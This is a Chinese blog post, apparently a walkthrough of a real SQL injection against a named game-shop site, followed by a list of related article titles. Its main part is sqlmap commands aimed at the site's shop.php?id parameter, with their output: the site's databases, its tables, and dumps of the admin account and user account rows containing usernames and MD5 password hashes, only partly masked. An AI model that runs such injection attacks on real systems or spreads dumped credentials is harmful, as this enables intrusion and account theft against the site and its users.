root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs

 

available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库

 

current database:    'dnweb'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user:    'root@localhost'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名

 

Database: dnweb
[25 tables]
+-----------------+
| account         |
| admin_user      |
| base            |
| chajian         |
| chongzhi        |
| duihuan         |
| libao_jilu      |
| libao_list      |
| meirilibao      |
| meirilibao_jilu |
| mianfei         |
| mianfei_list    |
| money_name      |
| role_dellist    |
| roleid          |
| server          |
| shop_list       |
| shop_list_copy  |
| shop_tag        |
| tuiguang        |
| xiaofei         |
| zhuce           |
| zkfcn           |
| zkfcq           |
| zkfwp           |
+-----------------+

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名

 

Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name,admin_pass " -T "admin_user" -D "dnweb"
#列数据

 

Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass                       |
+------------+----------------------------------+
| lok**      | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+

 
 
 

Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| createtime | datetime     |
| dlts       | int(11)      |
| email      | varchar(255) |
| gold       | int(10)      |
| id         | int(10)      |
| jifen      | int(10)      |
| lastip     | varchar(16)  |
| logintime  | datetime     |
| lxdl       | int(11)      |
| money      | int(10)      |
| money2     | int(10)      |
| name       | varchar(32)  |
| namemd5id  | varchar(32)  |
| password   | varchar(32)  |
| regip      | varchar(16)  |
| security   | varchar(32)  |
| tg         | int(10)      |
| tg2        | int(10)      |
| tingyong   | int(11)      |
| vip        | int(255)     |
+------------+--------------+

 
 
 

+-------+------------+-------------+----------------------------------+----------+
| id    | email      | name        | password                         | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350*     | a414409798  | cee4fce6eaa87581421c296cbc0d3064 | NULL     |
| 11828 | 000000     | lo***       | 670b14728ad9902aecba32e22fa4f6bd** | NULL     |
| 11829 | 8888*       | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL     |
| 11830 | 123456     | 203412594*  | cfd40caa535bb51378ab60849bb54486 | NULL     |
| 11831 | 123456789  | na101*      | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11832 | NULL       | hyt100*     | 4c49c824492864666980b012bcf17d08 | NULL     |
| 11833 | 32312*     | hehe52121*  | 0733f98f76375074a3424d5b6e8ffd68 | NULL     |
| 11834 | 123456789* | fong201*    | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL     |
| 11835 | 123456     | q50504*     | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11836 | 1*          | wf199*      | 96e79218965eb72c92a549dd5a330112 | NULL     |
+-------+------------+-------------+----------------------------------+----------+

 

某网SQL注入漏洞实战的更多相关文章

  1. 【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  2. 【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  3. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  4. 【代码审计】XIAOCMS_后台database.php页面存在SQL注入漏洞

      0x00 环境准备 XIAOCMS官网: http://www.xiaocms.com/ 网站源码版本:XiaoCms (发布时间:2014-12-29) 程序源码下载:http://www.xi ...

  5. sql注入学习笔记,什么是sql注入,如何预防sql注入,如何寻找sql注入漏洞,如何注入sql攻击 (原)

    (整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文章最后关于如何预防sql注入) (整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文 ...

  6. sqlmap检测sql注入漏洞

    sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 官网:http://sqlmap.org/ 乌 ...

  7. 【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入 漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

  8. 【代码审计】iZhanCMS_v2.1 前台GoodsController.php页面存在SQL注入漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

  9. 【代码审计】iZhanCMS_v2.1 后台存在多个SQL注入漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

随机推荐

  1. 【开源框架】EFW框架中的系统权限与页面子权限详解

    回<[开源]EFW框架系列文章索引> EFW框架源代码下载V1.3:http://pan.baidu.com/s/1c0dADO0 EFW框架实例源代码下载:http://pan.baid ...

  2. [原]如何在Android用FFmpeg+SDL2.0解码图像线程

    关于如何在Android上用FFmpeg+SDL2.0解码显示图像参考[原]如何在Android用FFmpeg+SDL2.0解码显示图像 ,关于如何在Android使用FFmpeg+SDL2.0解码声 ...

  3. 未能找到类型或命名空间名称“Coco”(是否缺少 using 指令或程序集引用)

    未能找到类型或命名空间名称"Coco"(是否缺少 using 指令或程序集引用),如果你确实引用了,那说明你引用的和你的项目环境版本不一样,.NET framework的问题,修改 ...

  4. 【转】在Eclipse里查看Java字节码

    要理解 Java 字节码,比较推荐的方法是自己尝试编写源码对照字节码学习.其中阅读 Java 字节码的工具必不可少.虽然javap可以以可读的形式展示出.class 文件中字节码,但每次改动源码都需调 ...

  5. andorid jni入门教程一之helloworld

    开发环境:windows2007, eclipse 做anroid越深发现用到底层开发的时候越多,但是我以前也没有搞过,因此现在打算好好学习学习.先从最简单的做起.正所谓万事开头难啊. 搞了近一天终于 ...

  6. EditorWindow中手动控制焦点

    在Unity3D中制作编辑器的时候,有时候会需要手动控制界面上控件的焦点,与此相关的有三个函数都在下面的示例代码中了: public void Test() { // 给控件命名 GUI.SetNex ...

  7. 自增长的聚集键值不会扩展(scale)

    如何选择聚集键值的最佳实践是什么?一个好的聚集键值应该有下列属性: 范围小的(Narrow) 静态的(Static) 自增长的(Ever Increasing) 我们来具体看下所有这3个属性,还有在S ...

  8. SCRUM:第一天任务实现情况

    我认领了我们团队“广商百货”应用平台的密码提示功能,任务暂时还在进行中.虽然建立了数据库,但是数据库里要存放什么数据,我们的小组还在讨论中.因为android的知识还在自学过程中,所以做起来比较慢,也 ...

  9. 如何花样展示自己的摄影作品?CSS+JS+Html

    注意:Windows平台推荐使用Edge.Chrome.FireFox,部分浏览器打不开 P.S.慢慢用鼠标在图片上拖拽会感觉更神奇     // 0.5 ? 1 : -1; }, ease: fun ...

  10. 使用jQueryUI的dialog实现一个提示功能

    信息提示给用户是程序开发中,最常用的一个功能. Insus.NET使用jQueryUI的dialog来实现一个,可以定义标题,对话框的大小等. 在ASP.NET MVC环境下来演示吧. 在Octobe ...